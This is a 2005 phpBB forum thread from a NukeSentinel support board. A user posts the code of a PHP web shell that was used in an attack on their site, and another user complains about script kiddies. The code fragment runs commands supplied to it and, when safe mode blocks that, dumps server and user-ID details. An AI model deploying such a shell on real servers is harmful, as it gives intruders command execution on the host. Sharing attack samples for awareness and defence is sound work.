Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
Author Message
hitwalker
Sells PC To Pay For Divorce



Joined:
Posts: 5661

PostPosted: Sun Feb 27, 2005 6:12 pm Reply with quote

i thought i had seen them all but i didnt...
just got a useless attack by this one....

[ Only registered users can see links on this board! Get registered or login! ]

and the code....

Code:


&1");
      else
        @passthru("$cmd");
      $output = ob_get_contents();
      ob_end_clean();
      if (!empty($output))
        echo str_replace(">", ">", str_replace("<", "<", $output));
    }
    else
      echo "No command to execute.";
  }
  else {
    echo "Due to SafeMode, it's unable to execute commands!\n";

    echo "Machine informations:\n";
    echo "PHP: ".phpversion()."\n";
    echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
    $uname = @posix_uname();
    if (!empty($uname)) {
      while (list($info, $value) = each($uname))
        echo "$value ";
      echo "\n";
    }
    $uids  = @posix_getlogin();
    $euids = @posix_getlogin();
    $uid   = @posix_getuid();
    $euid  = @posix_geteuid();
    $gid   = @posix_getgid();
    if (!empty($uid))
      echo "User: uid=$uids($uid) euid=$euid($euid) gid=$gid($gid)\n";
  }

?>
 
View user's profile Send private message
sting
Involved
Involved



Joined: Sep 23, 2003
Posts: 456
Location: Somewhere out there...

PostPosted: Sun Jun 05, 2005 3:26 pm Reply with quote

sigh... Between ddos and script kiddies, this gets old fast...

-sting
 
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©